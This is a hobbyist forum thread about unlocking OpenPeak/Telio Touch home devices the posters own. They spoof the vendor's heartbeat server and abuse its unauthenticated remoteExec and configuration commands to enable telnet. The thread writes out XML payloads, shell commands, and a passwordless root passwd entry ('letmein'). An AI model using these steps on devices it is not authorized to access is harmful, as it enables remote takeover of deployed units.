How to break in / enable telnet on a OpenPeak 2 / Telio Touch with disabled USB boot and telnet

General discussion relating to the O2 Joggler, from the default O2 setup, to alternative operating systems and applications.
Post Reply
niwa
Posts: 8
Joined: Tue Oct 12, 2021 10:10 pm

How to break in / enable telnet on a OpenPeak 2 / Telio Touch with disabled USB boot and telnet

Post by niwa »

I've finally been able to break in to my Telio Touch. After trying blind typing on all the USB sticks I could dig up, I realized that USB boot must have been disabled.
After reading through old posts I realized that it's sending a heartbeat http request to https://services.openpeak.net/dms/devic ... MACADDRESS
The heartbeat rate seems to vary between a few seconds and a few minutes, it seems to slow down if it fails and run fast if it works.

@roobarb! posted the default response in another thread:

Code: Select all

<?xml version="1.0" encoding="UTF-8"?>
<command><postDeviceDetails url="https://services.openpeak.net/dms/postDeviceDetails/12344844" method="post" /></command>
I disassembled the responsible file, libopdms.so, and found out that the command tag can contain one or more or the following commands:

Code: Select all

<postDeviceDetails url="https://example.com/deviceDetails" />
Returns a long list of settings and data on the device, partitions, versions etc.

Code: Select all

<downloadFirmware mode="" reboot="">
   <downloadURL>http://example.com/firmware_file.ext</downloadURL>
   <successURL>http://example.com/success</successURL>
   <failureURL>http://example.com/failure</failureURL>
   <notesURL>http://example.com/notes</notesURL>
</downloadFirmware>
Update firmware. Don't know what kind if file it expects, probably a .tgz-file similar to what was used by the automatic updates.

Code: Select all

<mediaDisplay contentType="application/x-shockwave-flash">
   <mediaURL>http://example.com/media.swf</mediaURL>
</mediaDisplay>
Can probably be used to start playback of media from a url.

Code: Select all

<motd />
Message of the day? Don't know what it does.

Code: Select all

<remoteExec commandId="1" timeout="5">
   <callbackURL>http://example.com/callback</callbackURL>
   <shText>cp /mnt/sda1/passwd /etc/</shText>
</remoteExec>
Execute a shell command. The callback always tells me that the command timed out even if it was successful.

Code: Select all

<publishMessage channel="" />
Don't know what this does

Code: Select all

<configuration>
   <device>
      <telnetEnabled>true</telnetEnabled>
   </device>
</configuration>
Change one of the settings in opservices.ini, can be used to enable telnet


I've only tested postDeviceDetails, configuration and remoteExec.

To enable telnet, I first set up a web server and a DNS server to forward requests to services.openpeak.net to my web server.
I created a file on the server called /dms/device/heartbeat
Then, to enable telnet I put this in the file:

Code: Select all

<?xml version="1.0" encoding="UTF-8"?>
<command>
   <configuration>
      <device>
         <telnetEnabled>true</telnetEnabled>
      </device>
   </configuration>
</command>
I also had to create a new user. Because this is executed every few seconds, I didn't want to directly write to /etc/passwd because then many lines might be added and I don't know how linux handles that.
I copied the file to a USB stick, edited the file on another computer and copied it back, using a combination of there commands in remoteExec:

Code: Select all

umount /dev/sda1
mount -t vfat /dev/sda1 /mnt
Had to remount it as it's mounted as read only by the OS.

Code: Select all

cp /etc/passwd /mnt/
Copy the file to the USB stick

Added the following line to the end of the file:

Code: Select all

letmein::0:0:root:/:/bin/sh

Code: Select all

cp /mnt/passwd /etc/
Copy the file back

After this I could log in using telnet with username letmein and no password.
Paul Webster
Posts: 115
Joined: Mon Jul 18, 2011 7:56 am

Re: How to break in / enable telnet on a OpenPeak 2 / Telio Touch with disabled USB boot and telnet

Post by Paul Webster »

Excellent.
I wonder if this could mean that installations can be done without using reflash system.
User avatar
DJWillis
Posts: 14
Joined: Wed Aug 24, 2011 8:39 pm

Re: How to break in / enable telnet on a OpenPeak 2 / Telio Touch with disabled USB boot and telnet

Post by DJWillis »

niwa,

Playing with this, thanks, on my test devices (a few stock OF1's and the Telio 38510) the heartbeats seem to come in regularly every 2 mins over Ethernet, on the button. Will check if they have some sort of back off on WiFi.

My setup is very simple (mongoose answering on 80 and 433, no cert, not even self signed, so it is a plain HTTP server on a custom port), and a basic split DNS setup on my side pushing services.openpeak.net to my internal server.

Moving on to getting stuff onto the device and playing a little more out of interest and I'll report back.
niwa
Posts: 8
Joined: Tue Oct 12, 2021 10:10 pm

Re: How to break in / enable telnet on a OpenPeak 2 / Telio Touch with disabled USB boot and telnet

Post by niwa »

Paul Webster wrote: Fri Oct 22, 2021 10:27 am Excellent.
I wonder if this could mean that installations can be done without using reflash system.
I suppose it can be done with the downloadFirmware command, but don't know how the files should look like. Probably it's the same format as the automatic updates, but I wasn't able to find any examples. All I could find out about them is that they are .tgz and should contain a payload folder.

I flashed the avaya rom on mine and after that I could boot the reflash or any other USB stick.
User avatar
DJWillis
Posts: 14
Joined: Wed Aug 24, 2011 8:39 pm

Re: How to break in / enable telnet on a OpenPeak 2 / Telio Touch with disabled USB boot and telnet

Post by DJWillis »

Hi niwa,

This worked a charm on my setup, a little split DNS and a simple web server was all that was needed. Ended up with a self signed cert on my setup but I don't think there is any attempt at cert (or even protocol) validation going on at all. It seems to respond just fine even if you leave a plain HTTP server running on port 443.

telnetEnabled worked on the 1st boot, I then tweaked the payload of the remoteExec stuff to suit what I wanted but that was a preference more than anything else.

It also seems to work on various other flavours of OpenPeak devices I have with stock OS's on the flash (as expected) so forms the basis of another way of opening up units that might be locked down :). Great to still be finding tweaks after so long.

downloadFirmware definitely looks promising for a way of getting a new payload onto a device. Will play more with that.

For info, in my case at least, once it gets something in heartbeat that has an actual command in it it goes mad polling twice a second, before that, it seems to go into a semi regular once a minute poll if it gets a response but no instructions.

Next up, flashing the EFI, I have done it on plenty of other OF2's so I think it may be worth the risk to get back to something with USB booting (so I can leave the internal flash alone to play more with this).

As an aside, I also have ended up doing something that may turn out to be daft, I now own openpeak.net. The reason behind this was simple, this hack exposes a really simple way to force a potentially unknown payload onto any stock or semi stock devices out in the wild still (and I suspect there is a surprising amount) and the security freak in me decided that one way to stop that happening is to control it. Also helped by the fact that I noticed whoever had been camping the domain and trying to get a huge fee for it had given up and let it lapse ;). I'll probably just point it at this forum and make a post about it but if anyone has better ideas or a community use for it (unbricking service, provided we can avoid abuse?), just let me know.
niwa
Posts: 8
Joined: Tue Oct 12, 2021 10:10 pm

Re: How to break in / enable telnet on a OpenPeak 2 / Telio Touch with disabled USB boot and telnet

Post by niwa »

I did also consider buying the domain, but forgot about it :D
Didn't really know what to do with it, could be interesting to see how many devices are polling the heartbeat. Did play with the idea of an unlocking service and using the mediaDisplay function to inform that there's such a service, but I doubt I would ever actually do it.
User avatar
roobarb!
Posts: 1675
Joined: Sat Mar 05, 2011 1:30 pm
Location: Salford, UK
Contact:

Re: How to break in / enable telnet on a OpenPeak 2 / Telio Touch with disabled USB boot and telnet

Post by roobarb! »

DJWillis wrote: Sat Oct 23, 2021 4:45 pmAs an aside, I also have ended up doing something that may turn out to be daft, I now own openpeak.net. The reason behind this was simple, this hack exposes a really simple way to force a potentially unknown payload onto any stock or semi stock devices out in the wild still (and I suspect there is a surprising amount) and the security freak in me decided that one way to stop that happening is to control it. Also helped by the fact that I noticed whoever had been camping the domain and trying to get a huge fee for it had given up and let it lapse ;). I'll probably just point it at this forum and make a post about it but if anyone has better ideas or a community use for it (unbricking service, provided we can avoid abuse?), just let me know.
This could be very useful; all of the updated firmware versions I've made (v30301 and later) have their heartbeat messages already redirected to "openbeak.net", on which I run a passive heartbeat server which prevents errors on the app pages and keeps their telephony service alive. It receives a remarkable amount of traffic, so goodness knows how many devices are out there still calling the original domain. I meant to register it myself and completely forgot to check up on its availability!

With what you have learned about the telnet unlock I think we could put something very useful together for those with locked devices. Want to sort something out?
User avatar
DJWillis
Posts: 14
Joined: Wed Aug 24, 2011 8:39 pm

Re: How to break in / enable telnet on a OpenPeak 2 / Telio Touch with disabled USB boot and telnet

Post by DJWillis »

roobarb! wrote: Thu Oct 28, 2021 2:14 am With what you have learned about the telnet unlock I think we could put something very useful together for those with locked devices. Want to sort something out?
Yes, if you already have a heartbeat server setup maybe we could point this domain onto that? Or I can easily host something similar. Will drop you a message.
Post Reply